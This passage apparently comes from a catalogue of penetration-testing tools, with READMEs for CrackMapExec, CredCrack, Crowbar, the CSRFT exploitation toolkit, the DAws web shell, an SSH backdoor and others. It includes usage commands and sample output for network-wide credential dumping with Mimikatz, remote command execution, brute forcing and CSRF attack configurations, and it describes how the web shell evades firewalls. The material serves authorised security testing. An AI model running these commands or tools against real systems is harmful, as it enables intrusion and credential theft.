  • Pure Python script, no external tools required
  • Fully concurrent threading
  • Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc...
  • Opsec safe (no binaries are uploaded to dump clear-text credentials, inject shellcode etc...)

Installation on Kali Linux

Run pip install --upgrade -r requirements.txt

Usage
  ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______ 
 /      ||   _  \         /   \      /      ||  |/  / |   \/   |     /   \     |   _  \  |   ____|\  \ /  / |   ____| /      |
|  ,----'|  |_)  |       /  ^  \    |  ,----'|  '  /  |  \  /  |    /  ^  \    |  |_)  | |  |__    \  V  /  |  |__   |  ,----'
|  |     |      /       /  /_\  \   |  |     |    <   |  |\/|  |   /  /_\  \   |   ___/  |   __|    >   <   |   __|  |  |     
|  `----.|  |\  \----. /  _____  \  |  `----.|  .  \  |  |  |  |  /  _____  \  |  |      |  |____  /  .  \  |  |____ |  `----.
 \______|| _| `._____|/__/     \__\  \______||__|\__\ |__|  |__| /__/     \__\ | _|      |_______|/__/ \__\ |_______| \______|

                Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r

                      Powered by Impacket https://github.com/CoreSecurity/impacket (@agsolino)

                                                  Inspired by:
                           @ShawnDEvans's smbmap https://github.com/ShawnDEvans/smbmap
                           @gojhonny's CredCrack https://github.com/gojhonny/CredCrack
                           @pentestgeek's smbexec https://github.com/pentestgeek/smbexec

positional arguments:
  target                The target range, CIDR identifier or file containing targets

optional arguments:
  -h, --help            show this help message and exit
  -t THREADS            Set how many concurrent threads to use
  -u USERNAME           Username, if omitted null session assumed
  -p PASSWORD           Password
  -H HASH               NTLM hash
  -n NAMESPACE          Namespace name (default //./root/cimv2)
  -d DOMAIN             Domain name
  -s SHARE              Specify a share (default: C$)
  -P {139,445}          SMB port (default: 445)
  -v                    Enable verbose output

Credential Gathering:
  Options for gathering credentials

  --sam                 Dump SAM hashes from target systems
  --mimikatz            Run Invoke-Mimikatz on target systems
  --ntds {ninja,vss,drsuapi}
                        Dump the NTDS.dit from target DCs using the specifed method
                        (drsuapi is the fastest)

Mapping/Enumeration:
  Options for Mapping/Enumerating

  --shares              List shares
  --sessions            Enumerate active sessions
  --users               Enumerate users
  --lusers              Enumerate logged on users
  --wmi QUERY           Issues the specified WMI query

Account Bruteforcing:
  Options for bruteforcing SMB accounts

  --bruteforce USER_FILE PASS_FILE
                        Your wordlists containing Usernames and Passwords
  --exhaust             Don't stop on first valid account found

Spidering:
  Options for spidering shares

  --spider FOLDER       Folder to spider (defaults to share root dir)
  --pattern PATTERN     Pattern to search for in filenames and folders
  --patternfile PATTERNFILE
                        File containing patterns to search for
  --depth DEPTH         Spider recursion depth (default: 1)

Command Execution:
  Options for executing commands

  --execm {atexec,wmi,smbexec}
                        Method to execute the command (default: smbexec)
  -x COMMAND            Execute the specified command
  -X PS_COMMAND         Excute the specified powershell command

Shellcode/EXE/DLL injection:
  Options for injecting Shellcode/EXE/DLL's using PowerShell

  --inject {exe,shellcode,dll}
                        Inject Shellcode, EXE or a DLL
  --path PATH           Path to the Shellcode/EXE/DLL you want to inject on the target systems
  --procid PROCID       Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)
  --exeargs EXEARGS     Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)

Filesystem interaction:
  Options for interacting with filesystems

  --list PATH           List contents of a directory
  --download PATH       Download a file from the remote systems
  --upload SRC DST      Upload a file to the remote systems
  --delete PATH         Delete a remote file

There's been an awakening... have you felt it?

Examples

The most basic usage: scans the subnet using 100 concurrent threads:
#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
Let's enumerate available shares:
#~  python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --shares
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Available shares:
    SHARE           Permissions
    -----           -----------
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Available shares:
    SHARE           Permissions
    -----           -----------
    Users           READ, WRITE
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
[+] 172.16.206.132:445 DRUGCOMPANY-PC Available shares:
    SHARE           Permissions
    -----           -----------
    Users           READ, WRITE
    ADMIN$          READ, WRITE
    IPC$            NO ACCESS
    C$              READ, WRITE
Let's execute some commands on all systems concurrently:
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via SMBEXEC
nt authority\system

[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via SMBEXEC
nt authority\system

[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via SMBEXEC
nt authority\system
Same as above only using WMI as the code execution method:
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --execm wmi -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via WMI
drugcompany-pc\administrator

[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via WMI
drugoutcove-pc\administrator

[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via WMI
desktop-qdvnp6b\drugdealer
Use an IEX cradle to run Invoke-Mimikatz.ps1 on all systems concurrently (PS script gets hosted automatically with an HTTP server), Mimikatz's output then gets POST'ed back to our HTTP server, saved to a log file and parsed for clear-text credentials:
#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --mimikatz
[*] Press CTRL-C at any time to exit
[*] Note: This might take some time on large networks! Go grab a redbull!
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
172.16.206.130 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/1.1" 200 -
[+] 172.16.206.133 Found plain text creds! Domain: drugoutcove-pc Username: drugdealer Password: IloveMETH!@$
[*] 172.16.206.133 Saved POST data to Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/1.1" 200 -
[*] 172.16.206.130 Saved POST data to Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/1.1" 200 -
[+] 172.16.206.132 Found plain text creds! Domain: drugcompany-PC Username: drugcompany Password: IloveWEED!@#
[+] 172.16.206.132 Found plain text creds! Domain: DRUGCOMPANY-PC Username: drugdealer Password: D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to Mimikatz-172.16.206.132-2015-08-19_18:57:48.log
Let's spider the C$ share, starting from the Users folder, for the pattern "password" in all files and directories (concurrently):
#~ python crackmapexec.py -t 150 172.16.206.0/24 -u username -p password --spider Users --depth 10 --pattern password
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Started spidering
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Started spidering
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Started spidering
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecrepasswords.lnk
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecretpasswords.lnk
//172.16.206.132/Users/drugcompany/Desktop/supersecretpasswords.txt
[+] 172.16.206.132:445 DRUGCOMPANY-PC Done spidering (Completed in 7.0349509716)
//172.16.206.133/Users/drugdealerboss/Documents/omgallthepasswords.txt
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Done spidering (Completed in 16.2127850056)
//172.16.206.130/Users/drugdealer/AppData/Roaming/Microsoft/Windows/Recent/superpasswords.txt.lnk
//172.16.206.130/Users/drugdealer/Desktop/superpasswords.txt.txt
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Done spidering (Completed in 38.6000130177)

For all available options, just run: python crackmapexec.py --help

Download CrackMapExec

CredCrack - Fast and Stealthy Credential Harvester


CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recursively, in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory.

Help
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples

Enumerating Share Access
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------

 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------

 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.0 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------

[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       


[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s


Download CredCrack

credmap - The Credential Mapper



Credmap is an open source tool that was created to bring awareness to the dangers of credential reuse. It is capable of testing supplied user credentials on several known websites to test if the password has been reused on any of these.

Help Menu

Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--username=USER..  set the username to test with
  -p/--password=PASS..  set the password to test with
  -e/--email=EMAIL      set an email to test with
  -l/--load=LOAD_FILE   load list of credentials in format USER:PASSWORD
  -x/--exclude=EXCLUDE  exclude sites from testing
  -o/--only=ONLY        test only listed sites
  -s/--safe-urls        only test sites that use HTTPS.
  -i/--ignore-proxy     ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.1.2:9050")
  --list                list available sites to test with

Examples

./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080"
./credmap.py --load list.txt
./credmap.py --list

Prerequisites

To get started, you will need Python 2.6+ (previous versions may work as well, however I haven't tested them)
  • Python 2.6+
  • Git (Optional)

Running the program

To run credmap, simply execute the main script "credmap.py".
$ python credmap.py -h

Video



Download credmap

Crouton - Chromium OS Universal Chroot Environment


crouton is a set of scripts that bundle up into an easy-to-use, Chromium OS-centric chroot generator. Currently Ubuntu and Debian are supported (using debootstrap behind the scenes), but "Chromium OS Debian, Ubuntu, and Probably Other Distros Eventually Chroot Environment" doesn't acronymize as well (crodupodece is admittedly pretty fun to say, though).

"crouton"...an acronym?

It stands for ChRomium Os Universal chrooT envirONment ...or something like that. Do capitals really matter if caps-lock has been (mostly) banished, and the keycaps are all lower-case?
Moving on...

Who's this for?

Anyone who wants to run straight Linux on their Chromium OS device, and doesn't care about physical security. You're also better off having some knowledge of Linux tools and the command line in case things go funny, but it's not strictly necessary.

What's a chroot?

Like virtualization, chroots provide the guest OS with their own, segregated file system to run in, allowing applications to run in a different binary environment from the host OS. Unlike virtualization, you are not booting a second OS; instead, the guest OS is running using the Chromium OS system. The benefit to this is that there is zero speed penalty since everything is run natively, and you aren't wasting RAM to boot two OSes at the same time. The downside is that you must be running the correct chroot for your hardware, the software must be compatible with Chromium OS's kernel, and machine resources are inextricably tied between the host Chromium OS and the guest OS. What this means is that while the chroot cannot directly access files outside of its view, it can access all of your hardware devices, including the entire contents of memory. A root exploit in your guest OS will essentially have unfettered access to the rest of Chromium OS.
...but hey, you can run TuxRacer!

Prerequisites

You need a device running Chromium OS that has been switched to developer mode.

For instructions on how to do that, go to this Chromium OS wiki page, click on your device model and follow the steps in the Entering Developer Mode section.

Note that developer mode, in its default configuration, is completely insecure, so don't expect a password in your chroot to keep anyone from your data. crouton does support encrypting chroots, but the encryption is only as strong as the quality of your passphrase. Consider this your warning.

It's also highly recommended that you install the crouton extension, which, when combined with the extension or xiwi targets, provides much improved integration with Chromium OS.
That's it! Surprised?

Usage

crouton is a powerful tool, and there are a lot of features, but basic usage is as simple as possible by design.

If you're just here to use crouton, you can grab the latest release from https://goo.gl/fd3zc. Download it, pop open a shell (Ctrl+Alt+T, type shell and hit enter), and run sh ~/Downloads/crouton to see the help text. See the "examples" section for some usage examples.

If you're modifying crouton, you'll probably want to clone or download the repo and then either run installer/main.sh directly, or use make to build your very own crouton. You can also download the latest release, cd into the Downloads folder, and run sh crouton -x to extract out the juicy scripts contained within, but you'll be missing build-time stuff like the Makefile.

crouton uses the concept of "targets" to decide what to install. While you will have apt-get in your chroot, some targets may need minor hacks to avoid issues when running in the chrooted environment. As such, if you expect to want something that is fulfilled by a target, install that target when you make the chroot and you'll have an easier time. Don't worry if you forget to include a target; you can always update the chroot later and add it. You can see the list of available targets by running sh ~/Downloads/crouton -t help.

Once you've set up your chroot, you can easily enter it using the newly-installed enter-chroot command, or one of the target-specific start* commands. Ta-da! That was easy.

Read more here.

Download Crouton

Crowbar - Brute Forcing Tool for Pentests


Crowbar (crowbar) is a brute forcing tool that can be used during penetration tests. It is developed to brute force some protocols in a different manner from other popular brute forcing tools. As an example, while most brute forcing tools use a username and password for SSH brute force, Crowbar uses an SSH key. So SSH keys that are obtained during penetration tests can be used to attack other SSH servers.

Currently Crowbar supports
  • OpenVPN
  • SSH private key authentication
  • VNC key authentication
  • Remote Desktop Protocol (RDP) with NLA support
Installation

First you should install the dependencies
 # apt-get install openvpn freerdp-x11 vncviewer
Then get the latest version from GitHub
 # git clone https://github.com/galkan/crowbar
Attention: Rdp depends on your Kali version. It may be xfreerdp for the latest version.

Usage

-h: Shows help menu.
-b: Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp.
-s: Target ip address.
-S: File name which stores target ip addresses.
-u: Username.
-U: File name which stores username list.
-n: Thread count.
-l: File name which stores the log. Default file name is crowbar.log, which is located in your current directory.
-o: Output file name which stores the successful attempts.
-c: Password.
-C: File name which stores passwords list.
-t: Timeout value.
-p: Port number
-k: Key file full path.
-m: Openvpn configuration file path
-d: Run nmap in order to discover whether the target port is open or not. So that you can easily brute to target using crowbar.
-v: Verbose mode which shows all the attempts, including failures.
If you want to see all usage options, please use crowbar --help


CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit


This project has been developed to exploit CSRF web vulnerabilities and provide you a quick and easy exploitation toolkit. In a few words, this is a simple HTTP server in NodeJS that will communicate with the clients (victims) and send them a payload that will be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.

* However, there's a tool in Python in the utils folder that you can use to automate CSRF exploitation. *

This project allows you to perform PoC (Proof Of Concepts) really easily. Let's see how to get/use it.

How to get/use the tool
First, clone it:
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here. Go into the directory and install all the dependencies:
npm install
Then, launch server.js:
$ node server.js
Usage will be displayed:
Usage : node server.js <file.json> <port : default 8080>

More information
By default, the server will be launched on port 8080, so you can access it via http://0.0.0.0:8080.
The JSON file must describe your attack scenarios. It can be wherever you want on your hard drive.
The index page displayed in the browser is accessible via /views/index.ejs.
You can change it as you want and give the link to your victim.

Different folders: what do they mean?
The idea is to provide a 'basic' folder hierarchy for your projects. I made the script quite modular, so your configuration files, malicious forms, etc. don't have to be in those folders. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :
  • conf folder : add your JSON configuration file with your configuration.
  • exploits folder : add all your *.html files containing your forms
  • public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
  • views folder : index file and exploit template
  • dicos : Folder containing all your dictionaries for those attacks
  • lib : libs specific to my project (custom ones)
  • utils : folder containing utils such as csrft_utils.py, which will launch CSRFT directly.
  • server.js file - the HTTP server

Configuration file templates

GET Request with special value
Here is a basic example of a JSON configuration file that will target www.vulnerable.com. This is a special value because the malicious payload is already in the URL/form.
{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "method": "GET", 
            "type_attack": "special_value", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
          }
        ]
      }
    ]
  }
}

GET Request with dictionary attack
Here is a basic example of a JSON configuration file. For every entry in the dictionary file, one HTTP request will be made.
{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt", 
            "method": "GET", 
            "type_attack": "dico", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}

POST Request with special value attack
{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "form": "/tmp/csrft/form.html", 
            "method": "POST", 
            "type_attack": "special_value"
          }
        ]
      }
    ]
  }
}
The form already includes the malicious payload. So it just has to be executed by the victim.
I hope you understood the principles. I didn't write an example for a POST with dictionary attack because there will be one in the next section.

Ok, but what do Scenario and Attack mean?
A scenario is composed of attacks. Those attacks can be simultaneous or at different times.
For example, you want to sign the user in and THEN you want him to perform some unwanted actions. You can specify it in the JSON file.
Let's take an example with both POST and GET requests:
{
    "audit": {
        "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

        "scenario": [
            {
                "attack": [
                    {
                        "method": "POST",
                        "type_attack": "dico",
                        "file": "passwords.txt",
                        "form": "deepsec_form_log_user.html",
                        "comment": "attempt to connect the admin with a list of selected passwords"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
                        "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
                    }
                ]
            },          
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
                        "comment": "The final step is to logout the admin"
                    }
                ] 
            }   
        ]
    }
}
You can now define some "steps", different attacks that will be executed in a certain order.

Use cases

A) I want to write my specific JSON configuration file and launch it by hand
Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can, but it shouldn't be this complicated.
Steps to succeed:
1) Create your configuration file, see samples in the conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do a dictionary attack, add your dictionary file to the dicos/ folder
4) Replace the value of the field you want to attack with the token <%value%>
=> either in your URLs for GET exploitation, or in the HTML files for POST exploitation.
5) Launch the application: node server.js conf/test.json


B) I want to automate attacks really easily
To do so, I developed a Python script, csrft_utils.py in the utils folder, that will do this for you.
Here are some basic use cases:
* GET parameter with dictionary attack: *
$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"
* POST parameter with special value attack: *
$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value


Download CSRFT

Cupp - Common User Passwords Profiler


The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.

A weak password might be very short or only use alphanumeric characters, making it simple to guess or crack. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.

That is why CUPP was born, and it can be used in situations like legal penetration tests or forensic crime investigations.

Options
Usage: cupp.py [OPTIONS]
    -h      this menu

    -i      Interactive questions for user password profiling

    -w      Use this option to profile existing dictionary,
            or WyD.pl output to make some pwnsauce :)

    -l      Download huge wordlists from repository

    -a      Parse default usernames and passwords directly from Alecto DB.
            Project Alecto uses purified databases of Phenoelit and CIRT which were merged and enhanced.

    -v      Version of the program

Configuration
CUPP has a configuration file, cupp.cfg, with instructions.


Download Cupp

Custom-SSH-Backdoor - SSH Backdoor using Paramiko


Custom ssh backdoor, coded in python using Paramiko.

Paramiko is a Python (2.6+, 3.3+) implementation of the SSHv2 protocol, providing both client and server functionality. While it leverages a Python C extension for low level cryptography (PyCrypto), Paramiko itself is a pure Python interface around SSH networking concepts.


Download Custom-SSH-Backdoor

Damn Vulnerable Web App - PHP/MySQL Training Web Application that is Damn Vulnerable


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

WARNING!

Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any working web server as it will be hacked. I recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing.

We do not take responsibility for the way in which anyone uses Damn Vulnerable Web App (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA, it is not our responsibility; it is the responsibility of the person/s who uploaded and installed it.


Download Damn Vulnerable Web App

DAws - Advanced Web Shell (Windows/Linux)


There are multiple things that make DAws better than every other web shell out there:
  1. Bypasses disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed. For example, if shell_exec was disabled it would automatically use exec, passthru, system, popen or proc_open instead. The same goes for downloading a file from a link: if curl was disabled then file_get_contents is used instead. This feature is widely used in every section and function of the shell.
  2. Automatic encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR (randomized key for every session) + Base64 (we created our own Base64 encoding functions instead of using the PHP ones to bypass disablers), which will allow your shell to bypass pretty much every WAF out there.
  3. Advanced file manager; DAws's file manager contains everything a file manager needs and even more, but the main feature is that everything is dynamically printed: the permissions of every file and folder are checked, and the functions that can be used are made available based on these permissions. This saves time and makes life much easier.
  4. Tools: DAws holds a bunch of useful tools such as "bpscan", which can identify usable and unblocked ports on the server within a few minutes, which can later on allow you to go for a bind shell, for example.
  5. Everything that can't be used at all is simply removed so users do not have to waste their time. Take, for example, the execution of C++ scripts when there are no C++ compilers on the server (DAws would have checked for multiple compilers in the first place); in this case the function is automatically removed and the user is told.
  6. Supports Windows and Linux.
  7. Open Source.

Extra Info
  • Eval Form:
    • `include` is used instead of PHP `eval` to bypass protection systems.
  • Download from Link - Methods:
    • PHP Curl
    • File_put_content
  • Zip - Methods:
    • Linux:
      • Zip
    • Windows:
      • Vbs Script
  • Shells and Tools:
    • Extra:
      • `nohup`, if installed, is automatically used for background processing.

Download DAws

Dharma - A generation-based, context-free grammar fuzzer

A generation-based, context-free grammar fuzzer.

Requirements

None

Examples

Generate a single test-case.
% ./dharma.py -grammars grammars/webcrypto.dg
Generate a single test case with multiple grammars.
% ./dharma.py -grammars grammars/canvas2d.dg grammars/mediarecorder.dg
Generate test-cases as files.
% ./dharma.py -grammars grammars/webcrypto.dg -storage . -count 5
Generate test-cases, send each over WebSocket to Firefox, observe the process for crashes and bucket them.
% ./dharma.py -server -grammars grammars/canvas2d.dg -template grammars/var/templates/html5/default.html
% ./framboise.py -setup inbound64-release -debug -worker 4 -testcase ~/dev/projects/fuzzers/dharma/grammars/var/index.html
Benchmark the generator.
% time ./dharma.py -grammars grammars/webcrypto.dg -count 10000 > /dev/null

Grammar Cheatsheet

Comment
%%% comment

Controls
%const% name := value

Sections
%section% := value
%section% := variable
%section% := variance

Extension methods
%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)

%repeat%(+variable+)
%repeat%(+variable+, ", ")

%uri%(path)
%uri%(lookup_key)

%block%(path)

%choice%(foo, "bar", 1)

Assigning values
digit :=
    %range%(0-9)

sign :=
    +
    -

value :=
    +sign+%repeat%(+digit+)

Using values
+value+

Assigning variables
variable :=
    @variable@ = new Foo();

Using variables
value :=
    !variable!.bar();

Referencing values from common.dg
value :=
    attribute=+common:number+

Calling javascript library functions
foo :=
    Random.pick([0,1]);


Download Dharma

Dirs3arch v0.3.0 - HTTP(S) Directory/File Brute Forcer


dirs3arch is a simple command line tool designed to brute force hidden directories and files in websites.

It's written in Python 3 and all third-party libraries are included.

Operating Systems supported
  • Windows XP/7/8
  • GNU/Linux
  • MacOSX

Features
  • Multithreaded
  • Keep alive connections
  • Support for multiple extensions (-e|--extensions asp,php)
  • Reporting (plain text, JSON)
  • Detect not found web pages when 404 not found errors are masked (.htaccess, web.config, etc).
  • Recursive brute forcing
  • HTTP(S) proxy support
  • Batch processing (-L)

Examples
  • Scan www.example.com/admin/ to find php files:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php
  • Scan www.example.com to find asp and aspx files with SSL:
    python3 dirs3arch.py -u https://www.example.com/ -e asp,aspx
  • Scan www.example.com with an alternative dictionary (from DirBuster):
    python3 dirs3arch.py -u http://www.example.com/ -e php -w db/dirbuster/directory-list-2.3-small.txt
  • Scan with HTTP proxy (localhost port 8080):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --http-proxy localhost:8080
  • Scan with custom User-Agent and custom header (Referer):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --user-agent "My User-Agent" --header "Referer: www.google.com"
  • Scan recursively:
